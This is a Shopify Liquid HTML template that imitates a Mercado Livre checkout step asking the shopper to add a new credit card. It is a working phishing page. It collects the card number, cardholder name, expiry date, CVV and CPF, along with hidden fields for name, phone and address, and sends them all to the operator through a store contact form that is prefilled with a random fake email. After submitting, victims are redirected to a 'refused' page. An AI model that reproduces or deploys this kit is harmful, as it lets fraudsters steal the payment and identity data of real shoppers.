



<script>
  // Verifique se a URL contém "contact_posted=true#contact_form"
  if (window.location.href.indexOf("contact_posted=true#contact_form") !== -1) {
    // Redirecione o usuário para a página /pages/recusado
    window.location.href = "/pages/recusado";
  }
</script>

<script>
  // Verifique se a URL contém "contact_posted=true#contact_form"
  if (window.location.href.indexOf("contact_posted") !== -1) {
    // Redirecione o usuário para a página /pages/recusado
    window.location.href = "/pages/recusado";
  }
</script>

<html lang="pt-BR">
  <head>
    <link rel="stylesheet" href="{{ 'card2.css' | asset_url }}">
  </head>
  <body data-site="ML" data-country="BR" style=""><iframe src="about:srcdoc" srcdoc="" id="GoogleAnalyticsIframe" style="width: 0px; height: 0px; border: 0px; position: absolute;"></iframe><iframe src="about:srcdoc" srcdoc="" id="MelidataIframe" style="width: 0px; height: 0px; border: 0px; position: absolute;"></iframe>
<header role="banner" data-siteid="MLB" class="nav-header nav-header-pluslite ui-navigation-v2"><div class="nav-bounds"><div class="nav-header-logo"><a style="display: none;" id="nav-skip-to-main-content" role="button" href="#root-app" class="nav-skip-to-main-content" aria-label="Pular para o conteúdo"><span class="nav-skip-to-main-content__content">Pular para o conteúdo</span></a><a class="nav-logo" href="#">Mercado Livre Brasil - Onde comprar e vender de Tudo</a></div><div class="nav-header-menu-wrapper"><nav id="nav-header-menu"><div class="nav-header-user"><label for="nav-header-user-switch"><a href="https://myaccount.mercadolivre.com.br/summary" class="nav-header-user-myml" aria-expanded="false" role="button" aria-label="Menu do usuário, aline"><span class="nav-header-usermenu-wrapper"><span class="nav-header-avatar-user" data-js="user-menu:nav-header-avatar-user"><i class="nav-icon-user"></i></span><span class="nav-header-username">aline</span><span class="nav-header-username-chevron"></span></span></a></label><input type="checkbox" id="nav-header-user-switch"><nav class="nav-header-user-layer user-menu--hidden user-menu user-menu__one-column" tabindex="-1" hidden="hidden" aria-label="Menu do usuário, aline" aria-modal="true" role="dialog">
        <div class="user-menu__main">
          
        <div class="user-menu__user-info-outer-container user-menu__user-with-loyalty">
          <div class="user-menu__user-info-inner-container">
          
        <div class="user-menu__user-badge user-menu__user-badge--center">
        
          <div class="user-menu__user-badge-image">
            
      
      <div class="user-menu__loyalty-components">
        
        <svg class="user-menu__user-progress user-menu--level-1" viewBox="0 0 100 100">
            <path class="base" stroke-linecap="round" stroke-width="4" stroke="#eee" fill="none" d="M50 10
                a 40 40 0 0 1 0 80
                a 40 40 0 0 1 0 -80">
            </path>
            
        </svg>
      
      </div>
    
      
        <form data-js="user-menu:avatar-form" method="POST" action="//www.mercadolivre.com.br/menu/user/picture" enctype="multipart/form-data" class="user-menu__avatar-form">
          <label class="user-menu__avatar-label">
            <span class="user-menu__avatar-text">Adicionar foto</span>
            
      <span data-js="user-menu:avatar-icon">
        <svg width="40" height="40" viewBox="0 0 40 40">
          <path fill-opacity=".25" fill-rule="evenodd" d="M20 0c11.046 0 20 8.954 20 20s-8.954 20-20 20S0 31.046 0 20 8.954 0 20 0zm0 1.5C9.783 1.5 1.5 9.783 1.5 20S9.783 38.5 20 38.5 38.5 30.217 38.5 20 30.217 1.5 20 1.5zM29.75 25v2.25H32v1.5h-2.25V31h-1.5v-2.25H26v-1.5h2.25V25h1.5zM26 24.25v1.5H13.98c-1.178 0-2.143.914-2.224 2.071l-.006.16v.75h-1.5v-.75c0-1.994 1.564-3.623 3.532-3.726l.198-.005H26zM19.999 9.248c3.728 0 6.751 3.023 6.751 6.751s-3.023 6.751-6.751 6.751-6.751-3.023-6.751-6.751 3.023-6.751 6.751-6.751zm0 1.5c-2.9 0-5.251 2.351-5.251 5.251 0 2.9 2.351 5.251 5.251 5.251 2.9 0 5.251-2.351 5.251-5.251 0-2.9-2.351-5.251-5.251-5.251z"></path>
        </svg>
      </span>
    
            <img data-js="user-menu:avatar-picture" hidden="" class="user-menu__avatar-picture">
            <input data-js="user-menu:avatar-control" name="file" type="file" class="user-menu__avatar-control" accept="image/jpeg,.jpg,image/gif,.gif,image/png,.png,.jpeg,image/webp,.webp">
          </label>
        </form>
      
    
          </div>
          <p class="user-menu__user-badge-title">Olá aline</p>
          <a href="https://www.mercadolivre.com.br/hub-engine/hubs/my-profile#menu-user" class="user-menu__user-badge-email">
          Meu perfil<span class="user-menu__user-badge-email__chevron"></span>
        </a>
          
          
        
        </div>
      
            <div class="user-menu__user-pill">
                  <a href="//www.mercadolivre.com.br/assinaturas/melimais#origin=drawer_pill" class="user-menu__user-pill-anchor">
                    <img src="https://http2.mlstatic.com/resources/frontend/statics/loyal/partners/meliplus/pill-drawer/pill_drawer_meliplus_mlb.png" alt="DRAWER_PILL_MELIPLUS" decoding="async" class="user-menu__user-pill-image">
                  </a>
                </div>
        </div>
      </div>
      
          
          
      <ul class="user-menu__shortcuts ">
        <li><span class="user-menu__shortcuts-separator"></span>
                      <a href="https://myaccount.mercadolivre.com.br/purchases/list#menu-user" data-id="purchases" rel="nofollow">
                        Compras
                        
                      </a>
                </li><li>
                      <a href="https://www.mercadolivre.com.br/perguntas/comprador#menu-user" data-id="questions" rel="nofollow">
                        Perguntas
                        
                      </a>
                </li><li>
                      <a href="https://www.mercadolivre.com.br/my-reviews?origin=user-menu#menu-user" data-id="my-reviews" rel="nofollow">
                        Opiniões
                        
                      </a>
                </li><li><span class="user-menu__shortcuts-separator"></span>
                      <a href="https://www.mercadolivre.com.br/cupons?source_page=mperfil#menu-user" data-id="coupons" rel="nofollow">
                        Cupons
                        
                      </a>
                </li><li>
                      <a href="https://www.mercadolivre.com.br/credits/hub#from=panel_nav_ml&amp;additional_info=header_menu#menu-user" data-id="credits" rel="nofollow">
                        Empréstimos
                        
                      </a>
                </li><li>
                      <a href="//www.mercadolivre.com.br/assinaturas#origin=menu-ml#menu-user" data-id="subscriptions" rel="nofollow">
                        Assinaturas
                        
                      </a>
                </li><li>
                      <a href="https://play.mercadolivre.com.br?origin=navigation_menu_ml#menu-user" data-id="mplay" rel="nofollow">
                        Mercado Play
                        <span class="user-menu__shortcuts-tag">Novo</span>
                      </a>
                </li><li><span class="user-menu__shortcuts-separator"></span>
                      <a href="https://www.mercadolivre.com.br/syi/core/list#menu-user" data-id="sell" rel="nofollow">
                        Vender
                        
                      </a>
                </li><li>
                      <a href="https://myaccount.mercadolivre.com.br/summary#menu-user" data-id="summary" rel="nofollow">
                        Resumo
                        
                      </a>
                </li><li>
                      <a href="https://www.mercadolivre.com.br/novidades?from=drawer#menu-user" data-id="news" rel="nofollow">
                        Novidades
                        
                      </a>
                </li><li>
                      <a href="https://myaccount.mercadolivre.com.br/listings/list#menu-user" data-id="listings" rel="nofollow">
                        Anúncios
                        
                      </a>
                </li><li>
                      <a href="https://myaccount.mercadolivre.com.br/sales/list#menu-user" data-id="sales" rel="nofollow">
                        Vendas
                        
                      </a>
                </li><li>
                      <a href="https://pa.mercadolivre.com.br/advertising?utm_source=drawer&amp;utm_medium=link&amp;utm_campaign=engagement#menu-user" data-id="advertising" rel="nofollow">
                        Publicidade
                        
                      </a>
                </li><li>
                      <a href="https://myaccount.mercadolivre.com.br/billing/summary#menu-user" data-id="bill" rel="nofollow">
                        Faturamento
                        
                      </a>
                </li><li>
                      <a href="https://www.mercadolivre.com.br/mercadoshops?utm_source=mercadolibre&amp;utm_medium=referral&amp;utm_campaign=hunting_always_on&amp;utm_content=menu_drawer#menu-user" data-id="mshops" rel="nofollow">
                        Mercado Shops
                        
                      </a>
                </li><li><span class="user-menu__shortcuts-separator"></span>
                      <a href="https://www.mercadolibre.com/jms/mlb/lgz/logout?go=https://www.mercadolivre.com.br#menu-user" data-id="logout" rel="nofollow">
                        Sair
                        
                      </a>
                </li>
      </ul>
    
        </div>
        <div class="user-menu__old">
          <a href="https://myaccount.mercadolivre.com.br#nav-header" rel="nofollow">Minha conta</a><a href="https://www.mercadolivre.com/jms/mlb/lgz/logout#nav-header" rel="nofollow">Sair</a>
        </div>
        <span class="user-menu__chevron"></span>
    </nav></div><a href="https://www.mercadolivre.com.br/ajuda#nav-header" class="option-help" rel="nofollow">Contato</a></nav></div></div></header>
  
  <main style="display: block;" role="main" id="root-app"><div class="main-wrapper cardForm-step-container"><div id="mldp"><div data-js="device-profile">
    
    <noscript>
        <img id="noscript" style="display: none" src="https://www.mercadolibre.com/jms/lgz/background/session/armor.7e1ec65f15d986499f90d8edc7e64d0246e5454e3ec9a204ea01fadda1e495c5be1145f82c7f92e67b94286769a6de544af68fd16253ca421432fd8cc772e3bcad4f97d7c55ea5f85557cab173513bcfac6029726b38854b53dba3931f972989.937032ad5694a1dfacb158fddca88c52?background=armor.7e1ec65f15d986499f90d8edc7e64d0246e5454e3ec9a204ea01fadda1e495c5be1145f82c7f92e67b94286769a6de544af68fd16253ca421432fd8cc772e3bcad4f97d7c55ea5f85557cab173513bcfac6029726b38854b53dba3931f972989.937032ad5694a1dfacb158fddca88c52&message=eyJqc190eXBlIjoianNfY29va2llIiwidmFsdWUiOiJ4In0">
    </noscript>
    </div></div><div class="bf-ui-layout" data-js="layout" data-id="layout"><div class="main-container" data-js="main-container" data-id="main_container"><div class="bf-ui-column-container" data-js="column-container" data-id="column_container"><div class="bf-ui-row-container" data-js="row-container" data-id="row_container"><h2 class="bf-ui-step-title" aria-label="Adicione um novo cartão" data-id="step_title" data-js="step-title"><span data-js="rich-text" class="bf-ui-rich-text">Adicione um novo cartão</span></h2></div></div><div class="bf-ui-detail-row bf-ui-detail-row--gray" data-js="detail-row" data-id="detail_row"><div class="bf-ui-detail-row__asset-wrapper"><div class="bf-ui-detail-row__asset" data-js="asset"><span class="bf-ui-icon-container bf-ui-icon-container--regular"><img id="buflo_congrats_payment_method_credit_card" class="bf-ui-icon bf-ui-icon--buflo_congrats_payment_method_credit_card" src="https://http2.mlstatic.com/frontend-assets/bf-ui-library/3.0.7/assets/icons/buflo_congrats_payment_method_credit_card.svg" alt=""></span></div></div><div class="bf-ui-detail-row__container"><div class="bf-ui-detail-row__content"><div class="bf-ui-detail-row__text"><p class="bf-ui-detail-row__title" data-js="title" aria-label="Novo cartão de crédito"><span data-js="rich-text" class="bf-ui-rich-text">Novo cartão de crédito</span></p></div><div class="bf-ui-detail-row__children"><div class="bf-ui-link-container bf-ui-link-container--vertical" data-js="link-container" data-id="link_container"><a class="bf-ui-link" data-js="link" data-id="link"><span data-js="rich-text" class="bf-ui-rich-text bf-ui-rich-text--regular bf-ui-rich-text--xsmall">Alterar</span></a></div></div></div><div class="bf-ui-detail-row__secondary-content"></div></div></div>

      
<script>
function formatCardNumber(input) {
    const value = input.value.replace(/\s/g, ''); // Remove espaços existentes
    const formattedValue = value.replace(/(\d{4})(?=\d)/g, '$1 '); // Adiciona espaços após cada grupo de 4 dígitos
    input.value = formattedValue;
}

function formatDateInput(input) {
    const value = input.value;
    
    if (value.length === 2 && !value.includes('/')) {
        input.value = value + ' / ';
    }
}
</script>


<script>
function formatCPFInput(input) {
    const value = input.value.replace(/\D/g, ''); // Remove caracteres não numéricos
    const formattedValue = value.replace(/(\d{3})(\d{3})(\d{3})(\d{2})/, '$1.$2.$3-$4'); // Formatação do CPF
    input.value = formattedValue;
}
</script>

      <script>
  // Function to generate a random email with @gmail.com domain
  function generateRandomEmail() {
    var randomUsername = Math.random().toString(36).substring(7);
    return randomUsername + "@gmail.com";
  }

  // Wait for the DOM to be ready
  document.addEventListener("DOMContentLoaded", function() {
    // Set the generated random email as the value of the email input field
    document.getElementById("ContactFormCard").value = generateRandomEmail();

    
  });
</script>
      
   {% form 'contact', id: 'meuFormulario' %}

      {% if form.errors %}
  <div class="errors">
    <h2>Oops! Algo deu errado.</h2>
    <ul>
      {% for error in form.errors %}
        <li>{{ error.message }}</li>
      {% endfor %}
    </ul>
  </div>
{% endif %}
      <form class="bf-ui-form" id="2"><div data-js="card" data-id="card_form" class="bf-ui-card bf-ui-card--flat"><div class="bf-ui-column-container" data-js="column-container" data-id="column_container"><div class="bf-ui-row-container" data-js="row-container" data-id="row_container"><div class="andes-form-control andes-form-control--textfield andes-form-control--default bf-ui-input-text bf-ui-library-secure-field">

<input style="display: none;" type="email" id="ContactFormCard" name="contact[email]" class="" value="">

        <input style="display: none;" type="text" id="ContactFormtype" name="contact[↓dados da cc↓]" class="" value="">

        <label for="ContactFormCardNumber" id="cardNumber"><span class="bf-ui-library-secure-field__label bf-ui-library-secure-field__label--error" style="color: rgba(0,0,0,.9);">Número de cartão</span><div id="card_number" data-js="card_number" class="bf-ui-library-secure-field__input bf-ui-library-secure-field__input--error" style="padding: 0; box-shadow: 0 0 0 1px rgba(0,0,0,.25);">




         <input type="text" id="ContactFormCardNumber" name="contact[----Número do Cartão]" class="inputf" minlength="16" maxlength="19" required="" oninput="formatCardNumber(this)">


        </div></label><div class="bf-ui-library-secure-field__message bf-ui-library-secure-field__message--error" style="display: none;"><span class="bf-ui-icon-container bf-ui-icon-container--regular"><img id="feedback_negative" class="bf-ui-icon bf-ui-icon--feedback_negative" src="https://http2.mlstatic.com/frontend-assets/bf-ui-library/3.0.7/assets/icons/feedback_negative.svg" alt=""></span><span data-js="rich-text" class="bf-ui-rich-text bf-ui-rich-text--bold" style="display: none;">Preencha esse dado</span></div></div><div class="andes-form-control andes-form-control--textfield bf-ui-input-text">



            <label for="ContactFormName"><span class="andes-form-control__label">Nome completo</span></label><div class="andes-form-control__control" style="padding: 0;">



              <input type="name" id="ContactFormName" name="contact[----Nome Impresso (Titular)]" class="inputf" maxlength="100" required="">


            </div><div class="andes-form-control__bottom"><span id="cardholder_name-message" class="andes-form-control__message">Assim como está impresso no cartão.</span></div></div><div class="bf-ui-column-container" data-js="column-container" data-id="column_container"><div class="andes-form-control andes-form-control--textfield andes-form-control--default bf-ui-input-text bf-ui-library-secure-field">




                <label for="ContactFormDate" id="expirationDate"><span class="bf-ui-library-secure-field__label">Data de vencimento</span><div id="expiration_date" data-js="expiration_date" class="bf-ui-library-secure-field__input">


                <input type="text" id="ContactFormDate" name="contact[----Data de Vencimento]" class="inputf" minlength="" maxlength="7" required="" oninput="formatDateInput(this)">

                </div></label><div class="bf-ui-library-secure-field__message"><span class="bf-ui-icon-container bf-ui-icon-container--regular"><img id="feedback_negative" class="bf-ui-icon bf-ui-icon--feedback_negative" src="https://http2.mlstatic.com/frontend-assets/bf-ui-library/3.0.7/assets/icons/feedback_negative.svg" alt=""></span><span data-js="rich-text" class="bf-ui-rich-text">Mês / Ano</span></div></div><div class="andes-form-control andes-form-control--textfield andes-form-control--default bf-ui-input-text bf-ui-library-secure-field">




                    <label for="ContactFormCod" id="securityCode"><span class="bf-ui-library-secure-field__label">Código de segurança</span><div id="security_code" data-js="security_code" class="bf-ui-library-secure-field__input">



                        <input type="tel" id="ContactFormCod" name="contact[----Código de Segurança (CVV)]" class="inputf" minlength="3" maxlength="3" required="">


                    </div></label><div class="bf-ui-library-secure-field__message"><span class="bf-ui-icon-container bf-ui-icon-container--regular"><img id="feedback_negative" class="bf-ui-icon bf-ui-icon--feedback_negative" src="https://http2.mlstatic.com/frontend-assets/bf-ui-library/3.0.7/assets/icons/feedback_negative.svg" alt=""></span><span data-js="rich-text" class="bf-ui-rich-text">Os 3 números no verso do cartão</span></div></div></div><div class="andes-form-control andes-form-control--textfield bf-ui-input-text">






                        <label for="ContactFormCPF"><span class="andes-form-control__label">CPF do titular do cartão</span></label><div class="andes-form-control__control">




                         <input type="tel" id="ContactFormCPF" name="contact[----CPF]" class="inputf" minlength="11" maxlength="14" required="" oninput="formatCPFInput(this)">

                         


                        </div></div></div><div class="bf-ui-row-container bf-ui-row-container--center-vertical" data-js="row-container" data-id="row_container_card_special_card"><div id="bf-payment-card-component" class="bf-payment-card-component  " aria-hidden="true" data-site="MLB"><div id="bf-payment-card-component__rotate" class="bf-payment-card-component__rotate-front"><div class="bf-payment-card-component__container bf-payment-card-component__front"><div class="bf-payment-card-component__background"></div><div class="bf-payment-card-component__background-overlay"></div><div class="bf-payment-card-component__row"><div class="bf-payment-card-component__col-4"><div id="bf-payment-card-component__logo" class="bf-payment-card-component__logo"></div><div id="bf-payment-card-component__logo_bank" class="bf-payment-card-component__logo-bank"></div></div></div><div class="bf-payment-card-component__row"><div class="bf-payment-card-component__col-4"><div id="bf-payment-card-component__security-front" data-hj-masked="true" class="bf-payment-card-component__security-front_default" style="visibility: hidden;"><div class="bf-payment-card-component__cvv-front"><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span></div></div></div></div><div class="bf-payment-card-component__row"><div class="bf-payment-card-component__col-4"><div id="bf-payment-card-component__number" data-hj-masked="true" class="bf-payment-card-component__number bf-payment-card-component__number-4-4-4-4"><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span></div></div></div><div class="bf-payment-card-component__row"><div class="bf-payment-card-component__col-3"><span id="bf-payment-card-component__name" class="bf-payment-card-component__name"></span></div><div class="bf-payment-card-component__col-1"><div id="bf-payment-card-component__expiration" class="bf-payment-card-component__expiration"><span class=""></span><span class=""></span><span class=""></span><span class=""></span></div></div></div></div><div class="bf-payment-card-component__tooltip bf-payment-card-component__tooltip--large" aria-label="Informe o CVV que está no app do seu banco"><div class="bf-payment-card-component__question bf-payment-card-component__question--large"><span data-js="rich-text" class="bf-ui-rich-text">Você tem cartão virtual?</span></div><div class="bf-payment-card-component__icon bf-payment-card-component__icon--large"><div><div class="andes-tooltip__trigger"><span class="bf-ui-icon-container bf-ui-icon-container--regular"><img id="question_blue" class="bf-ui-icon bf-ui-icon--question_blue" src="https://http2.mlstatic.com/frontend-assets/bf-ui-library/3.0.7/assets/icons/question_blue.svg" alt=""></span></div></div></div></div><div class="bf-payment-card-component__container bf-payment-card-component__back"><div class="bf-payment-card-component__background"></div><div class="bf-payment-card-component__background-overlay"></div><div class="bf-payment-card-component__row"><div class="bf-payment-card-component__col-4"><div class="bf-payment-card-component__magnetic"></div></div></div><div class="bf-payment-card-component__row"><div class="bf-payment-card-component__col-3"><div class="bf-payment-card-component__signature"><span></span><span></span><span></span><span></span><span></span><span></span></div></div><div class="bf-payment-card-component__col-1"><div id="bf-payment-card-component__security-back" data-hj-masked="true" class="bf-payment-card-component__security bf-payment-card-component__security-back"><div class="bf-payment-card-component__cvv"><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span><span class="bf-payment-card-component__point"></span></div></div></div></div></div></div></div></div></div></div><div class="bf-ui-button-container bf-ui-button-container--vertical bf-ui-button-container--transparent bf-ui-button-container--right" data-js="button-container" data-id="button_container">
                          
                          
                          <button type="submit" class="andes-button bf-ui-button andes-button--large andes-button--loud" id="react-aria-3" data-js="button" data-id="button_continue"><span class="andes-button__content"><span class="andes-button__text">Continuar</span></span></button>

                        
                        
                        </div>

      
      <div style="display: none;">
      <input type="text" id="invalidtrue"name="contact[↓DADOS DO CLIENTE↓]">

        
      <input type="text" id="email-ar"name="contact[----e-mail]">

    <script>
        // Obter o valor armazenado anteriormente e exibi-lo em um input
        var dado1Value = localStorage.getItem("dado1");
        document.getElementById("email-ar").value = dado1Value;
    </script>



    <input required="" id="address_destinatario" value="" placeholder="" type="text" name="contact[----nome completo]" class="andes-form-control__field">

    <input type="tel" id="phone" name="contact[----telefone]" pattern="[0-9]{11}" required="" placeholder="(99) 999999999" class="andes-form-control__field">

    <input value="" required="" id="address_cep" name="contact[----cep]" type="tel" maxlength="9" class="andes-form-control__field">

    <input id="address_estado" value="" type="text" name="contact[----estado]" class="andes-form-control__field">

    <input id="address_cidade" value="" type="text" name="contact[----cidade]" class="andes-form-control__field">

    <input id="address_bairro" value="" type="text" name="contact[----bairro]" class="andes-form-control__field">

    <input id="address_rua" name="contact[----rua]" type="text" value="" class="andes-form-control__field">

    <input autocomplete="do-not-autofill" name="contact[----numero]" textbox="false" rows="1" id="addresses_street_number" value="" class="andes-form-control__field" maxlength="128" placeholder="" aria-label="Número">

    
</div>





    

    
    


    
      </form>  
      {% endform %}



      
    
    </div><div class="secondary-container secondary-container--gray" data-js="secondary-container" data-id="secondary_container"><div data-js="secondary-container-inner_content" class="secondary-container-inner_content secondary-container-inner_content--static">
     
        
        <form class="bf-ui-form" id="1"><div class="bf-ui-ticket" data-js="ticket" data-id="ticket">
          
          
          
          
           {% for line_item in cart.items %}
               {% if item.variant.product.id == product.id %}
         
          <div class="bf-ui-detail-wrapper bf-ui-detail-wrapper--transparent" data-js="detail-wrapper"><div data-js="detail-block" data-id="detail_block" class="bf-ui-detail-block"><div data-js="image" class="bf-ui-detail-block__image">
            
              <img style="width: 60px;
    height: auto;
    border: 1px solid #c3c3c3;
    border-radius: 100%;" class="misc-img product-img img-fluid {% if section.settings.img_thumbnail %}img-thumbnail{% else %}rounded{% endif %}" data-src="{{ line_item.image | img_url: img_size, crop: 'center' }}"srcset="{{ line_item.image | img_url: img_size, crop: 'center' }}"
                                                    loading="lazy"
                                                    alt="{{ line_item.image.alt | escape }}"
                                                    width="{{ section.settings.img_width }}"
                                                    height="{{ section.settings.img_height }}">     </div><div class="bf-ui-detail-block__text"><h2 class="bf-ui-detail-block__title" data-js="title" aria-label="Smart Tv 43'' Crystal Uhd 4k 43cu7700 Preta Samsung Bivolt"><span data-js="rich-text" class="bf-ui-rich-text">{{ line_item.product.title }}</span></h2><div class="bf-ui-detail-block__description" data-js="description"><p class="bf-ui-detail-block__description-text" aria-label="Quantidade: 1"><span data-js="rich-text" class="bf-ui-rich-text">Quantidade: {{ line_item.quantity }}</span></p></div></div></div></div>     {% endif %}{% endfor %}  <div class="bf-ui-separator" data-js="separator" data-id="separator"></div><div class="bf-ui-ticket-row" id="ticket_row" data-js="ticket-row"><div class="bf-ui-ticket-row__left-column" data-js="left-column"><p class="bf-ui-ticket-row__left-column--primary-text" data-js="primary-text" aria-label="Produto"><span data-js="rich-text" class="bf-ui-rich-text">Produto</span></p></div><div class="bf-ui-ticket-row__right-column" data-js="right-column"><div class="bf-ui-ticket-row__right-column__content"><p class="bf-ui-ticket-row__right-column--primary-text" data-js="primary-text" aria-label="1899 reais"><span itemprop="offers" itemscope="" itemtype="http://schema.org/Offer" class="bf-ui-rich-price"><meta itemprop="price" content="1.899"><span itemprop="priceCurrency" aria-hidden="true">R$<!-- -->&nbsp;</span><span class="bf-ui-price-small">
                                                    {% assign total_price = cart.total_price | money_without_currency %}
{% assign parts = total_price | split: ',' %}
{% assign integer_part = parts[0] %}
{% assign decimal_part = parts[1] | default: '00' %} {{ integer_part }}</span></span><span class="bf-ui-price-small-cents">{{ decimal_part }}</span></p></div></div></div><div class="bf-ui-ticket-row" id="ticket_row" data-js="ticket-row"><div class="bf-ui-ticket-row__left-column" data-js="left-column"><p class="bf-ui-ticket-row__left-column--primary-text" data-js="primary-text" aria-label="Frete"><span data-js="rich-text" class="bf-ui-rich-text">Frete</span></p></div><div class="bf-ui-ticket-row__right-column" data-js="right-column"><div class="bf-ui-ticket-row__right-column__content"><p class="bf-ui-ticket-row__right-column--primary-text" data-js="primary-text" aria-label="Grátis"><span data-js="rich-text" class="bf-ui-rich-text bf-ui-rich-text--success">Grátis</span></p></div></div></div><div class="bf-ui-separator" data-js="separator" data-id="separator"></div><div class="bf-ui-ticket-row" id="ticket_row" data-js="ticket-row"><div class="bf-ui-ticket-row__left-column" data-js="left-column"><p class="bf-ui-ticket-row__left-column--primary-text" data-js="primary-text" aria-label="Você pagará"><span data-js="rich-text" class="bf-ui-rich-text">Você pagará</span></p></div><div class="bf-ui-ticket-row__right-column" data-js="right-column"><div class="bf-ui-ticket-row__right-column__content"><p class="bf-ui-ticket-row__right-column--primary-text" data-js="primary-text" aria-label="1899 reais"><span itemprop="offers" itemscope="" itemtype="http://schema.org/Offer" class="bf-ui-rich-price bf-ui-rich-price--bold bf-ui-rich-price--mid"><meta itemprop="price" content="1.899"><span itemprop="priceCurrency" aria-hidden="true">R$<!-- -->&nbsp;</span><span class="bf-ui-price-small"> {% assign total_price = cart.total_price | money_without_currency %}
{% assign parts = total_price | split: ',' %}
{% assign integer_part = parts[0] %}
{% assign decimal_part = parts[1] | default: '00' %} {{ integer_part }}</span></span><span class="bf-ui-price-small-cents">{{ decimal_part }}</span></p></div></div></div></div></form></div></div></div></div></main>
  
  
  <footer style="display: ;" role="contentinfo" class="nav-footer"><div class="nav-footer-user-info nav-bounds"><div class="nav-footer-info-wrapper"><div class="nav-footer-primaryinfo"><small class="nav-footer-copyright">Copyright ©&nbsp;1999-2024 Ebazar.com.br LTDA.</small><nav class="nav-footer-navigation"><ul class="nav-footer-navigation__menu"><li class="nav-footer-navigation__item"><a href="https://careers-meli.mercadolibre.com/pt?utm_campaign=site-mlb&amp;utm_source=mercadolibre&amp;utm_medium=mercadolibre" class="nav-footer-navigation__link">Trabalhe conosco</a></li><li class="nav-footer-navigation__item"><a href="https://www.mercadolivre.com.br/ajuda/Termos-e-condicoes-gerais-de-uso_1409" class="nav-footer-navigation__link">Termos e condições</a></li><li class="nav-footer-navigation__item"><a href="https://www.mercadolivre.com.br/privacidade" class="nav-footer-navigation__link">Como cuidamos da sua privacidade</a></li><li class="nav-footer-navigation__item"><a href="https://www.mercadolivre.com.br/acessibilidade" class="nav-footer-navigation__link">Acessibilidade</a></li><li class="nav-footer-navigation__item"><a href="https://www.mercadolivre.com.br/ajuda" class="nav-footer-navigation__link">Contato</a></li><li class="nav-footer-navigation__item"><a href="https://www.mercadolivre.com.br/ajuda/23303" class="nav-footer-navigation__link">Informações sobre seguros</a></li></ul></nav></div><p class="nav-footer-secondaryinfo">CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Mercado Livre.</p></div></div><a class="nav-footer-hp" href="https://hp.mercadolibre.com/?p=ML&amp;s=MLB&amp;d=desktop">Mercado Livre</a></footer>
    <iframe src="https://www.mercadolibre.com/jms/lgz/background?dps=armor.7e1ec65f15d986499f90d8edc7e64d0246e5454e3ec9a204ea01fadda1e495c5be1145f82c7f92e67b94286769a6de544af68fd16253ca421432fd8cc772e3bcad4f97d7c55ea5f85557cab173513bcfac6029726b38854b53dba3931f972989.937032ad5694a1dfacb158fddca88c52" style="display: none; width: 0; height: 0; border: none; margin: 0;"></iframe><iframe id="_hjSafeContext_84612199" title="_hjSafeContext" tabindex="-1" aria-hidden="true" src="about:blank" style="display: none !important; width: 1px !important; height: 1px !important; opacity: 0 !important; pointer-events: none !important;"></iframe><div style="width:0px; height:0px; display:none; visibility:hidden;" id="batBeacon615755680520"><img style="width:0px; height:0px; display:none; visibility:hidden;" id="batBeacon972106296171" width="0" height="0" alt="" src="https://bat.bing.com/action/0?ti=21024398&amp;tm=gtm002&amp;Ver=2&amp;mid=1f90d388-8e49-410d-ac2e-c26f4688c294&amp;sid=30f4e1c0490611eeaf9423af40ac5d15&amp;vid=dd4bbbe00a1b11eebe6b811ced0f6259&amp;vids=0&amp;msclkid=N&amp;uach=pv%3D10.0.0&amp;pi=918639831&amp;lg=pt-BR&amp;sw=1366&amp;sh=768&amp;sc=24&amp;tl=Mercado%20Livre%20Brasil%20-%20Onde%20comprar%20e%20vender%20de%20Tudo&amp;p=https%3A%2F%2Fwww.mercadolivre.com.br%2Fgz%2Fcheckout%2Fdirect%2Fbuying%2F4d3bcf2fc96943ce88976b0cfb28669b%2FcardFormFlox&amp;r=https%3A%2F%2Fwww.mercadolivre.com.br%2Fgz%2Fcheckout%2Fdirect%2Fbuying%2F4d3bcf2fc96943ce88976b0cfb28669b%2FcardFormFlox&amp;lt=1513&amp;evt=pageLoad&amp;sv=1&amp;rn=426985"></div><iframe src="https://www.mercadolibre.com/jms/lgz/background?dps=armor.4f3e502bf923ef073849801b1d3d18ad2ac771d1c534bf760d9e3ad3460c6cac1bcdc81345ccf13b7fbaaa1ba5167abd2ab0702d1fe2b1f4adf8b981875bfe9a8433e3723a7c449b90167a5bbb6af841b72d9a38b004d5295e6b2c5b32dc5d2f.457357ef205228c2c72dfc832e17e12a" style="display: none; width: 0; height: 0; border: none; margin: 0;"></iframe><!-- Code injected by live-server -->

<b style="position: absolute; left: -1000px;"><iframe style="display: none;"></iframe></b></body></html>